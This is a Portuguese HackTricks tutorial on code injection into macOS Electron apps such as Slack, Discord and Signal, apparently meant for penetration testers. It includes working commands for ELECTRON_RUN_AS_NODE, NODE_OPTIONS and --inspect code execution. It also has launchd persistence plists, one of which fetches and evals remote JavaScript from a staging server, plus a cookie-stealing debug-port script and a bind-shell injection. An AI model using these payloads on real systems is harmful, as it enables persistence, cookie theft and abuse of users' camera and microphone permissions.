18 KiB
Injeção em Aplicações Electron no macOS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? Ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.
Informações Básicas
Se você não sabe o que é Electron, você pode encontrar muitas informações aqui. Mas por enquanto, saiba que o Electron executa o node.
E o node possui alguns parâmetros e variáveis de ambiente que podem ser usados para executar outro código além do arquivo indicado.
Fusíveis do Electron
Essas técnicas serão discutidas a seguir, mas recentemente o Electron adicionou várias flags de segurança para evitá-las. Esses são os Fusíveis do Electron e estes são os usados para prevenir que aplicativos Electron no macOS carreguem código arbitrário:
RunAsNode
: Se desativado, impede o uso da variável de ambienteELECTRON_RUN_AS_NODE
para injetar código.EnableNodeCliInspectArguments
: Se desativado, parâmetros como--inspect
,--inspect-brk
não serão respeitados. Evitando assim a injeção de código dessa forma.EnableEmbeddedAsarIntegrityValidation
: Se ativado, o arquivoasar
carregado será validado pelo macOS. Prevenindo dessa forma a injeção de código ao modificar o conteúdo deste arquivo.OnlyLoadAppFromAsar
: Se isso estiver ativado, em vez de procurar para carregar na seguinte ordem:app.asar
,app
e finalmentedefault_app.asar
. Ele só verificará e usará app.asar, garantindo assim que, quando combinado com o fusívelembeddedAsarIntegrityValidation
, seja impossível carregar código não validado.LoadBrowserProcessSpecificV8Snapshot
: Se ativado, o processo do navegador usa o arquivo chamadobrowser_v8_context_snapshot.bin
para seu snapshot V8.
Outro fusível interessante que não impedirá a injeção de código é:
- EnableCookieEncryption: Se ativado, o armazenamento de cookies no disco é criptografado usando chaves de criptografia em nível de sistema operacional.
Verificando os Fusíveis do Electron
Você pode verificar essas flags de um aplicativo com:
npx @electron/fuses read --app /Applications/Slack.app
Analyzing app: Slack.app
Fuse Version: v1
RunAsNode is Disabled
EnableCookieEncryption is Enabled
EnableNodeOptionsEnvironmentVariable is Disabled
EnableNodeCliInspectArguments is Disabled
EnableEmbeddedAsarIntegrityValidation is Enabled
OnlyLoadAppFromAsar is Enabled
LoadBrowserProcessSpecificV8Snapshot is Disabled
Modificando os Fusíveis do Electron
Conforme mencionado na documentação, a configuração dos Fusíveis do Electron é feita dentro do binário do Electron, que contém em algum lugar a string dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX
.
Nos aplicativos do macOS, isso geralmente está localizado em application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework
.
grep -R "dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX" Slack.app/
Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches
Você pode carregar este arquivo em https://hexed.it/ e procurar pela string anterior. Após esta string, você pode ver em ASCII um número "0" ou "1" indicando se cada fusível está desabilitado ou habilitado. Basta modificar o código hexadecimal (0x30
é 0
e 0x31
é 1
) para modificar os valores dos fusíveis.
Observe que se você tentar sobrescrever o binário do Electron Framework dentro de um aplicativo com esses bytes modificados, o aplicativo não será executado.
RCE adicionando código a Aplicações Electron
Pode haver arquivos JS/HTML externos que um aplicativo Electron está usando, então um atacante pode injetar código nesses arquivos cuja assinatura não será verificada e executar código arbitrário no contexto do aplicativo.
{% hint style="danger" %} No entanto, no momento existem 2 limitações:
- A permissão
kTCCServiceSystemPolicyAppBundles
é necessária para modificar um aplicativo, portanto, por padrão, isso não é mais possível. - O arquivo compilado
asap
geralmente tem os fusíveisembeddedAsarIntegrityValidation
e
onlyLoadAppFromAsar
habilitados
Tornando esse caminho de ataque mais complicado (ou impossível). {% endhint %}
Observe que é possível contornar o requisito de kTCCServiceSystemPolicyAppBundles
copiando o aplicativo para outro diretório (como /tmp
), renomeando a pasta app.app/Contents
para app.app/NotCon
, modificando o arquivo asar com seu código malicioso, renomeando-o de volta para app.app/Contents
e executando-o.
Você pode descompactar o código do arquivo asar com:
npx asar extract app.asar app-decomp
E empacote-o novamente após tê-lo modificado com:
npx asar pack app-decomp app-new.asar
RCE com ELECTRON_RUN_AS_NODE
De acordo com a documentação, se essa variável de ambiente for definida, ela iniciará o processo como um processo Node.js normal.
{% code overflow="wrap" %}
# Run this
ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
# Then from the nodeJS console execute:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
{% endcode %}
{% hint style="danger" %}
Se o fusível RunAsNode
estiver desativado, a variável de ambiente ELECTRON_RUN_AS_NODE
será ignorada e isso não funcionará.
{% endhint %}
Injeção a partir do App Plist
Conforme proposto aqui, você pode abusar dessa variável de ambiente em um plist para manter a persistência:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
</dict>
<key>Label</key>
<string>com.xpnsec.hideme</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>-e</string>
<string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
RCE com NODE_OPTIONS
Você pode armazenar a carga útil em um arquivo diferente e executá-lo:
{% code overflow="wrap" %}
# Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');
# Execute
NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord
{% endcode %}
{% hint style="danger" %}
Se o fusível EnableNodeOptionsEnvironmentVariable
estiver desativado, o aplicativo ignorará a variável de ambiente NODE_OPTIONS quando iniciado, a menos que a variável de ambiente ELECTRON_RUN_AS_NODE
seja definida, o que também será ignorado se o fusível RunAsNode
estiver desativado.
Se você não definir ELECTRON_RUN_AS_NODE
, você encontrará o erro: A maioria das NODE_OPTIONs não é suportada em aplicativos empacotados. Consulte a documentação para mais detalhes.
{% endhint %}
Injeção a partir do App Plist
Você pode abusar dessa variável de ambiente em um plist para manter a persistência adicionando estas chaves:
<dict>
<key>EnvironmentVariables</key>
<dict>
<key>ELECTRON_RUN_AS_NODE</key>
<string>true</string>
<key>NODE_OPTIONS</key>
<string>--require /tmp/payload.js</string>
</dict>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>
RCE com inspeção
De acordo com este artigo, se você executar um aplicativo Electron com flags como --inspect
, --inspect-brk
e --remote-debugging-port
, uma porta de depuração será aberta para que você possa se conectar a ela (por exemplo, pelo Chrome em chrome://inspect
) e você poderá injetar código nela ou até mesmo iniciar novos processos.
Por exemplo:
{% code overflow="wrap" %}
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator')
{% endcode %}
{% hint style="danger" %}
Se o fusível EnableNodeCliInspectArguments
estiver desativado, o aplicativo ignorará os parâmetros do node (como --inspect
) ao ser iniciado, a menos que a variável de ambiente ELECTRON_RUN_AS_NODE
seja definida, o que também será ignorado se o fusível RunAsNode
estiver desativado.
No entanto, ainda é possível usar o parâmetro do Electron --remote-debugging-port=9229
, mas a carga útil anterior não funcionará para executar outros processos.
{% endhint %}
Usando o parâmetro --remote-debugging-port=9222
, é possível roubar algumas informações do aplicativo Electron, como o histórico (com comandos GET) ou os cookies do navegador (pois eles são descriptografados dentro do navegador e há um endpoint json que os fornecerá).
Você pode aprender como fazer isso aqui e aqui e usar a ferramenta automática WhiteChocolateMacademiaNut ou um simples script como:
import websocket
ws = websocket.WebSocket()
ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00", suppress_origin=True)
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv()
Neste post do blog, esse processo de depuração é explorado para fazer com que o Chrome sem interface faça download de arquivos arbitrários em locais arbitrários.
Injeção a partir do App Plist
Você pode explorar essa variável de ambiente em um plist para manter a persistência adicionando estas chaves:
<dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Slack.app/Contents/MacOS/Slack</string>
<string>--inspect</string>
</array>
<key>Label</key>
<string>com.hacktricks.hideme</string>
<key>RunAtLoad</key>
<true/>
</dict>
Bypassando o TCC abusando de versões antigas
{% hint style="success" %} O daemon TCC do macOS não verifica a versão executada do aplicativo. Portanto, se você não consegue injetar código em um aplicativo Electron com nenhuma das técnicas anteriores, você pode baixar uma versão anterior do APP e injetar código nele, pois ele ainda obterá as permissões do TCC (a menos que o Trust Cache o impeça). {% endhint %}
Executando código não JS
As técnicas anteriores permitirão que você execute código JS dentro do processo do aplicativo Electron. No entanto, lembre-se de que os processos filhos são executados sob o mesmo perfil de sandbox do aplicativo pai e herdam suas permissões do TCC.
Portanto, se você deseja abusar das permissões para acessar a câmera ou o microfone, por exemplo, você pode simplesmente executar outro binário a partir do processo.
Injeção automática
A ferramenta electroniz3r pode ser facilmente usada para encontrar aplicativos Electron vulneráveis instalados e injetar código neles. Essa ferramenta tentará usar a técnica --inspect
:
Você precisa compilá-la por conta própria e pode usá-la da seguinte maneira:
# Find electron apps
./electroniz3r list-apps
╔══════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ Bundle identifier │ Path ║
╚──────────────────────────────────────────────────────────────────────────────────────────────────────╝
com.microsoft.VSCode /Applications/Visual Studio Code.app
org.whispersystems.signal-desktop /Applications/Signal.app
org.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app
com.neo4j.neo4j-desktop /Applications/Neo4j Desktop.app
com.electron.dockerdesktop /Applications/Docker.app/Contents/MacOS/Docker Desktop.app
org.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app
com.github.GitHubClient /Applications/GitHub Desktop.app
com.ledger.live /Applications/Ledger Live.app
com.postmanlabs.mac /Applications/Postman.app
com.tinyspeck.slackmacgap /Applications/Slack.app
com.hnc.Discord /Applications/Discord.app
# Check if an app has vulenrable fuses vulenrable
## It will check it by launching the app with the param "--inspect" and checking if the port opens
/electroniz3r verify "/Applications/Discord.app"
/Applications/Discord.app started the debug WebSocket server
The application is vulnerable!
You can now kill the app using `kill -9 57739`
# Get a shell inside discord
## For more precompiled-scripts check the code
./electroniz3r inject "/Applications/Discord.app" --predefined-script bindShell
/Applications/Discord.app started the debug WebSocket server
The webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5
Shell binding requested. Check `nc 127.0.0.1 12345`
Referências
- https://www.electronjs.org/docs/latest/tutorial/fuses
- https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks
- https://m.youtube.com/watch?v=VWQY5R2A6X8
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? Ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e o repositório hacktricks-cloud.